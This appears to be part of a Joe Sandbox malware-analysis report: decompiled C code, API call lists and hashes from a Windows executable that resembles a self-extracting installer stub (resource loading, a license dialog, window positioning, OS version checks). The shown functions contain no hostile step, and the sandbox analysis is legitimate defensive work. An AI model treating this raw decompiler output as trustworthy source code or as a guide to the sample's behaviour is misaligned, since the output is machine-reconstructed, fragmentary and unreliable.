						}
						if( *_t64 != 0x23) {
							L19:
							_t65 = CharNextA(_t65);
						} else {
							_t64 = CharNextA(_t64);
							if(CharUpperA( *_t64) != 0x44) {
								if(CharUpperA( *_t64) != 0x45) {
									if( *_t64 == 0x23) {
										goto L19;
									}
								} else {
									E00A91680(_t65, E00A917C8(_t44, _t65),  &_v268);
									_t52 = _t65;
									_t14 =  &(_t52[1]); // 0x2
									_t60 = _t14;
									do {
										_t32 =  *_t52;
										_t52 =  &(_t52[1]);
									} while (_t32 != 0);
									goto L17;
								}
							} else {
								E00A965E8( &_v268);
								_t55 =  &_v268;
								_t62 = _t55 + 1;
								do {
									_t34 =  *_t55;
									_t55 = _t55 + 1;
								} while (_t34 != 0);
								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
								if(_t38 != 0 &&  *_t38 == 0x5c) {
									 *_t38 = 0;
								}
								E00A91680(_t65, E00A917C8(_t44, _t65),  &_v268);
								_t59 = _t65;
								_t12 =  &(_t59[1]); // 0x2
								_t60 = _t12;
								do {
									_t42 =  *_t59;
									_t59 =  &(_t59[1]);
								} while (_t42 != 0);
								L17:
								_t65 =  &(_t65[_t52 - _t60]);
							}
						}
						_t64 = CharNextA(_t64);
					}
					 *_t65 = _t17;
				}
				return E00A96CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
			}






















                                                                                                                                                                                                                                            0x00a92bc1
                                                                                                                                                                                                                                            0x00a92bc1
                                                                                                                                                                                                                                            0x00a92b26
                                                                                                                                                                                                                                            0x00a92bda
                                                                                                                                                                                                                                            0x00a92bda
                                                                                                                                                                                                                                            0x00a92be6
                                                                                                                                                                                                                                            0x00a92be6
                                                                                                                                                                                                                                            0x00a92bf8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A92AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A92AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A92B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 00A92B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 00A92B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A92BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: f590e3c70d20d24a0f4292ece8e0b2bc17526f4ace8ac5bef8c4e358902c0893
                                                                                                                                                                                                                                            • Instruction ID: 15b1386419034eab08e3b6eff8aaa4ecc41ec0eebcd8d74a5edd9c0943868fc2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f590e3c70d20d24a0f4292ece8e0b2bc17526f4ace8ac5bef8c4e358902c0893
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A141D0347042466EDF159F249C54BFD7BE99FA6310F24419BE8C287202DF258E86CBA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A943D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                            0x00a94481
                                                                                                                                                                                                                                            0x00a94484
                                                                                                                                                                                                                                            0x00a9448a
                                                                                                                                                                                                                                            0x00a94492
                                                                                                                                                                                                                                            0x00a94496
                                                                                                                                                                                                                                            0x00a94496
                                                                                                                                                                                                                                            0x00a94486
                                                                                                                                                                                                                                            0x00a94486
                                                                                                                                                                                                                                            0x00a94486
                                                                                                                                                                                                                                            0x00a944b8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00A943F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00A9440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00A94423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A9442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A9443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00A94447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A944A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: 7ac51760e8850dab26da5f9eb87d97199d6e1bf10a77b960d89173f22362a43f
                                                                                                                                                                                                                                            • Instruction ID: 59f9e04058dd83d851518cf3fad4023b0ebe8494be27bdc0b04e7e811fdae6d4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ac51760e8850dab26da5f9eb87d97199d6e1bf10a77b960d89173f22362a43f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C931FD72B00119ABCF14CFF8DD49DAEBBB5EB89310F15426AE805B7250DA706D068BA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E00A96298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E00A9171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0xa9a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E00A9171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E00A96CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9171E: _vsnprintf.MSVCRT ref: 00A91750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A962CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A962D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A9631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A96345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A951CA,00000004,00000024,00A92F71,?,00000002,00000000), ref: 00A96357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: ee5a81924b581b5bbcbbf001d3dbac559f4bf7d7419236a9dc5013a16f015b20
                                                                                                                                                                                                                                            • Instruction ID: 68fd33d2768a97667c23c2560d60545a4170604dfd600887d50fa6f1f0419a1b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee5a81924b581b5bbcbbf001d3dbac559f4bf7d7419236a9dc5013a16f015b20
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E521D675B00219ABDF10DFA49C459FF7BB8FF48714B10421AF902A7241DB359D068BE1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A9681F(void* __ebx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                                                            				void* _v172;
                                                                                                                                                                                                                                            				int* _v176;
                                                                                                                                                                                                                                            				int _v180;
                                                                                                                                                                                                                                            				int _v184;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                                            				signed int _t35;
                                                                                                                                                                                                                                            				void* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t36 = __ebx;
                                                                                                                                                                                                                                            				_t19 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                                                            				_t41 =  *0xa981d8; // 0xfffffffe
                                                                                                                                                                                                                                            				_t43 = 0;
                                                                                                                                                                                                                                            				_v180 = 0xc;
                                                                                                                                                                                                                                            				_v176 = 0;
                                                                                                                                                                                                                                            				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                                                            					 *0xa981d8 = 0;
                                                                                                                                                                                                                                            					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                            					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                                                            						L12:
                                                                                                                                                                                                                                            						_t41 =  *0xa981d8; // 0xfffffffe
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t41 = 1;
                                                                                                                                                                                                                                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t31 = RegQueryValueExA(_v172, 0xa91140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                                                            							_t43 = _t31;
                                                                                                                                                                                                                                            							RegCloseKey(_v172);
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t40 =  &_v176;
                                                                                                                                                                                                                                            								if(E00A966F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                                                            									goto L12;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                                                            									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                                                            										 *0xa981d8 = _t41;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L12;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A96CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A9686E
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004A), ref: 00A968A7
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A968CC
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00A91140,00000000,?,?,0000000C), ref: 00A968F4
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A96902
                                                                                                                                                                                                                                              • Part of subcall function 00A966F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A9691A), ref: 00A96741
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Control Panel\Desktop\ResourceLocale, xrefs: 00A968C2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                            • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                            • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                            • Opcode ID: 394f5b5b3d6bf70c7fae195a11315303d4fee2daabbb5c9c992bbd3717dedee9
                                                                                                                                                                                                                                            • Instruction ID: f31bc48d3086a8524752c9bac01b5c9b7f8d7cc2cbc704b9ac50040698d54771
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 394f5b5b3d6bf70c7fae195a11315303d4fee2daabbb5c9c992bbd3717dedee9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7314F31B002289FDF21CB55CC45FAAB7F8EF46764F1001A7E949A6250DF319E86CB92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A93A3F(void* __eflags) {
                                                                                                                                                                                                                                            				void* _t3;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t16 = "LICENSE";
                                                                                                                                                                                                                                            				_t1 = E00A9468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				 *0xa98d4c = _t3;
                                                                                                                                                                                                                                            				if(_t3 != 0) {
                                                                                                                                                                                                                                            					_t19 = _t16;
                                                                                                                                                                                                                                            					if(E00A9468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                                                            						if(lstrcmpA( *0xa98d4c, "<None>") == 0) {
                                                                                                                                                                                                                                            							LocalFree( *0xa98d4c);
                                                                                                                                                                                                                                            							L9:
                                                                                                                                                                                                                                            							 *0xa99124 = 0;
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t9 = E00A96517(_t19, 0x7d1, 0, E00A93100, 0, 0);
                                                                                                                                                                                                                                            						LocalFree( *0xa98d4c);
                                                                                                                                                                                                                                            						if(_t9 != 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa99124 = 0x800704c7;
                                                                                                                                                                                                                                            						L2:
                                                                                                                                                                                                                                            						return 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree( *0xa98d4c);
                                                                                                                                                                                                                                            					 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L2;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A944B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            				goto L2;
                                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946A0
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: SizeofResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946A9
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A946C3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LoadResource.KERNEL32(00000000,00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946CC
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: LockResource.KERNEL32(00000000,?,00A92D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946D3
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: memcpy_s.MSVCRT ref: 00A946E5
                                                                                                                                                                                                                                              • Part of subcall function 00A9468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A946EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A92F64,?,00000002,00000000), ref: 00A93A5D
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A93AB3
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A94518
                                                                                                                                                                                                                                              • Part of subcall function 00A944B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A94554
                                                                                                                                                                                                                                              • Part of subcall function 00A96285: GetLastError.KERNEL32(00A95BBC), ref: 00A96285
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A93AD0
                                                                                                                                                                                                                                            • LocalFree.KERNEL32 ref: 00A93B13
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: FindResourceA.KERNEL32(00A90000,000007D6,00000005), ref: 00A9652A
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: LoadResource.KERNEL32(00A90000,00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A96538
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: DialogBoxIndirectParamA.USER32(00A90000,00000000,00000547,00A919E0,00000000), ref: 00A96557
                                                                                                                                                                                                                                              • Part of subcall function 00A96517: FreeResource.KERNEL32(00000000,?,?,00A92EE8,00000000,00A919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A96560
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00A93100,00000000,00000000), ref: 00A93AF4
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$LICENSE
                                                                                                                                                                                                                                            • API String ID: 2414642746-383193767
